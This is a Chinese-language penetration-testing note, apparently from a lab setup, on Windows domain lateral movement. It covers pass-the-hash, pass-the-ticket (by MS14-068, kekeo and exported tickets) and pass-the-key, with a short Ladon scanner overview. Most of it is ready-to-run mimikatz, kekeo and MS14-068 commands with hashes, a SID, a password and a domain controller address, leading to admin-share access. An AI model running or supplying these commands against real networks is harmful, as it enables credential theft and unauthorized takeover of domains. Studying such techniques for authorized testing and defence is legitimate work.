域横向 PTH PTK PTT

PTH（pass the hash）

利用lm或ntlm的值进行的渗透测试

• PTH在内网渗透中是一种很经典的攻击方式，原理就是攻击者可以直接通过LM Hash和NTLM Hash访问远程主机或服务，而不用提供明文密码。

• 未打补丁下的工作组及域连接

• mimikatz查询出本机NTLM后，通过本机的NTLM值连接域内其它主机（如果设置的密码相同，即可连上）后，弹出一个cmd窗口，可输入对应要连接主机的ip，连接并执行命令（可对内网存活主机的ip依次进行测试）

sekurlsa::pth /user:administrator /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7

sekurlsa::pth /user:administrator /domain:workgroup /ntlm:518b98ad4178a53695dc997aa02d455c

sekurlsa::pth /user:boss /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7

\\OWA2010CN-God.god.org

PTT（pass the ticket）

利用的票据凭证TGT进行的渗透测试

第一种利用漏洞:MS14-068

能实现普通用户直接获取域控system权限，需要在：MS14-068 powershell中执行

1.查看当前sid whoami/user

2.mimikatz # kerberos::purge
//清空当前机器中所有凭证，如果有域成员凭证会影响凭证伪造
mimikatz # kerberos::list          //查看当前机器凭证
mimikatz # kerberos::ptc 票据文件   //将票据注入到内存中

3.利用ms14-068生成TGT数据
ms14-068.exe -u 域成员名@域名 -s sid -d 域控制器地址 -p 域成员密码
MS14-068.exe -u mary@god.org -s S-1-5-21-1218902331-2157346161-1782232778-1124 -d 192.168.3.21 -p admin!@#45

4.票据注入内存
mimikatz.exe "kerberos::ptc TGT_mary@god.org.ccache" exit

5.查看凭证列表 klist

6.利用
dir \\192.168.3.21\c$

第二种利用工具:kekeo

1.生成票据
kekeo "tgt::ask /user:mary /domain:god.org /ntlm:518b98ad4178a53695dc997aa02d455c"

2.导入票据
kerberos::ptt TGT_mary@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi

3.查看凭证 klist

4.利用net use载入
dir \\192.168.3.21\c$

第三种利用本地票据(需管理权限)

sekurlsa::tickets /export

kerberos::ptt xxxxxxxxxx.xxxx.kirbi

总结：PTT传递不需本地管理员权限，连接时主机名连接，基于漏洞,工具,本地票据

PTK（pass the key）

利用的ekeys aes256进行的渗透测试

• 目标主机必须打了补丁，用户才可连接

• 通过mimikatz获取aes256值后，进行连接

• 打补丁后的工作组及域连接

sekurlsa::ekeys #获取aes

sekurlsa::pth /user:mary /domain:god/aes256:d7c1d9310753a2f7f240e5b2701dc1e6177d16a6e40af3c5cdff814719821c4b

国产Ladon(K8)内网杀器

信息收集-协议扫描-漏洞探针-传递攻击等

• 扫描在线主机
  

• 检测网段中是否存在ms17010漏洞
  

• 扫描网段中是否开发445端口，可以进行smbscan的连接
  

• 连接192.168.3.21主机
  

涉及资源

https://github.com/k8gege/Ladon
https://github.com/gentilkiwi/kekeo/releases
https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068